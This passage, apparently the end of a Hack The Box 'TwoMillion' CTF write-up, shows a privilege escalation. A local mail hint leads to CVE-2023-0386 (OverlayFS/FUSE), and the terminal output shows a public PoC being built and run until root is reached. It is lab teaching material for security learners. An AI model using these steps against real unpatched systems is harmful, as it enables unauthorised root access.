/var/www/html/css/htb-frontpage.css
/var/www/html/css/animate.css
/var/www/html/css/htb-frontend.css
/var/www/html/css/stroke-icons/style.css
/var/www/html/css/stroke-icons/stroke.woff
/var/www/html/css/stroke-icons/stroke.eot
/var/www/html/css/stroke-icons/stroke.svg
/var/www/html/css/stroke-icons/stroke.ttf

╔══════════╣ Searching installed mail applications
                                                                                                                                                            
╔══════════╣ Mails (limit 50)
      271      4 -rw-r--r--   1 admin    admin         540 Jun  2 23:20 /var/mail/admin                                                                     
      271      4 -rw-r--r--   1 admin    admin         540 Jun  2 23:20 /var/spool/mail/admin

...(omitted)

Oh, there's some mail! Let's have a look.

admin@2million:/tmp$ cat /var/mail/admin 
From: ch4p <ch4p@2million.htb>
To: admin <admin@2million.htb>
Cc: g0blin <g0blin@2million.htb>
Subject: Urgent: Patch System OS
Date: Tue, 1 June 2023 10:45:22 -0700
Message-ID: <9876543210@2million.htb>
X-Mailer: ThunderMail Pro 5.2

Hey admin,

I'm know you're working as fast as you can to do the DB migration. While we're partially down, can you also upgrade the OS on our web host? There have been a few serious Linux kernel CVEs already this year. That one in OverlayFS / FUSE looks nasty. We can't get popped by that.

HTB Godfather

OverlayFS / FUSE???

CVE-2023-0386

Searching for "OverlayFS / FUSE" turns up the following site.

It appears to be a filesystem vulnerability.
A PoC for this vulnerability is available on the following GitHub repository.

So let's run the exploit using this PoC.

admin@2million:/tmp/taks/CVE-2023-0386$ make all
gcc fuse.c -o fuse -D_FILE_OFFSET_BITS=64 -static -pthread -lfuse -ldl
fuse.c: In function ‘read_buf_callback’:
fuse.c:106:21: warning: format ‘%d’ expects argument of type ‘int’, but argument 2 has type ‘off_t’ {aka ‘long int’} [-Wformat=]
  106 |     printf("offset %d\n", off);
      |                    ~^     ~~~
      |                     |     |
      |                     int   off_t {aka long int}
      |                    %ld
fuse.c:107:19: warning: format ‘%d’ expects argument of type ‘int’, but argument 2 has type ‘size_t’ {aka ‘long unsigned int’} [-Wformat=]
  107 |     printf("size %d\n", size);
      |                  ~^     ~~~~
      |                   |     |
      |                   int   size_t {aka long unsigned int}
      |                  %ld
fuse.c: In function ‘main’:
fuse.c:214:12: warning: implicit declaration of function ‘read’; did you mean ‘fread’? [-Wimplicit-function-declaration]
  214 |     while (read(fd, content + clen, 1) > 0)
      |            ^~~~
      |            fread
fuse.c:216:5: warning: implicit declaration of function ‘close’; did you mean ‘pclose’? [-Wimplicit-function-declaration]
  216 |     close(fd);
      |     ^~~~~
      |     pclose
fuse.c:221:5: warning: implicit declaration of function ‘rmdir’ [-Wimplicit-function-declaration]
  221 |     rmdir(mount_path);
      |     ^~~~~
/usr/bin/ld: /usr/lib/gcc/x86_64-linux-gnu/11/../../../x86_64-linux-gnu/libfuse.a(fuse.o): in function `fuse_new_common':
(.text+0xaf4e): warning: Using 'dlopen' in statically linked applications requires at runtime the shared libraries from the glibc version used for linking
gcc -o exp exp.c -lcap
gcc -o gc getshell.c
admin@2million:/tmp/taks/CVE-2023-0386$ ./fuse ./ovlcap/lower ./gc
[+] len of gc: 0x3ee0
mkdir: File exists



[+] readdir
[+] getattr_callback
/file
[+] open_callback
/file
[+] read buf callback
offset 0
size 16384
path /file
[+] open_callback
/file
[+] open_callback
/file
[+] ioctl callback
path /file
cmd 0x80086601

Once the filesystem is mounted, run the next command from a separate terminal.

admin@2million:/tmp/taks/CVE-2023-0386$ ./exp
uid:1000 gid:1000
[+] mount success
total 8
drwxrwxr-x 1 root   root     4096 Jun  8 13:25 .
drwxr-xr-x 6 root   root     4096 Jun  8 13:24 ..
-rwsrwxrwx 1 nobody nogroup 16096 Jan  1  1970 file
[+] exploit success!
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

(screenshot: 24.png)
Privilege escalation succeeded!!

Summary

(screenshot: 25.png)

I think this is the first box in a while that actually felt like an Easy. Isn't it good teaching material for API hacking??

As always, I hope this helps fellow security engineers.
